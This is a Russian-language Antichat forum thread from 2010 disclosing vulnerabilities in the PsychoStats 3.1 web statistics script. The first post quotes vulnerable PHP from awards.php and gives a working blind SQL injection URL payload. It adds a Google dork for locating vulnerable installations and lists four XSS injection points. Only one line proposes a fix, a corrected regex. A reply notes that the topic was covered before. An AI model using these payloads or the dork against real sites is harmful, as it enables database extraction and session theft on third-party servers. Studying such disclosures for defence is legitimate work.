ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Сценарии/CMF/СMS
Перезагрузить страницу PsychoStats
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

PsychoStats
  #1  
Старый 03.01.2010, 18:06
Аватар для oRb
oRb
Members of Antichat - Level 5
Регистрация: 09.05.2008
Сообщений: 304
Провел на форуме:
7875940

Репутация: 2362
По умолчанию PsychoStats
Продукт: PsychoStats 3.1 http://www.psychostats.com/
Уязвимость: Blind SQL-injection
Описание:
файл awards.php
PHP код:
if (empty($d) or !preg_match('/\d\d\d\d-\d\d?-\d\d?/'$d)) {
    $d date('Y-m-d');
//    $d = $range[$v]['max'];
}
...
$cmd "SELECT awarddate FROM $ps->t_awards WHERE awardrange = '$v' AND awarddate <= '$d' ";
if ($p$cmd .= "AND topplrid=$_p ";
$cmd .= "ORDER BY awarddate DESC LIMIT 1";
list($d) = $ps->db->fetch_list($cmd); 
Результат попадает вторым параметром в функцию date. Т.е. можно определять по дате в календаре результат выполнения sql запроса. (изврат)
Эксплойт:
Код:
/awards.php?d=2009-12-01'+and+0+union+select+1%23
Дорк: "Powered by PsychoStats" inurl:awards.php
Зависимости: magic_quotes_gpc = off
Решение: замена паттерна на следующий "/^\d\d\d\d-\d\d?-\d\d?$/"


XSS'ки:
/query.php?s=[XSS]
/ajax/flaglist.php?id='%3E[XSS] (работает только для зареганных)
/ajax/iconlist.php?id='%3E[XSS] (работает только для зареганных)
/admin/login.php?ref=%22%3E[XSS]
__________________
включи голову
 
Ответить с цитированием

  #2  
Старый 03.01.2010, 22:07
Аватар для rushter
rushter
Reservists Of Antichat - Level 6
Регистрация: 23.05.2008
Сообщений: 756
Провел на форуме:
9257858

Репутация: 979


Отправить сообщение для rushter с помощью ICQ
По умолчанию
Вроде в роа уже была тема с психостатом.
__________________
Blog
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Заливаем шелл через PsychoStats AFoST Авторские статьи 29 02.04.2010 22:13
[ Уязвимости статистики для онлайн игр ] halkfild Сценарии/CMF/СMS 11 13.01.2010 04:07



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ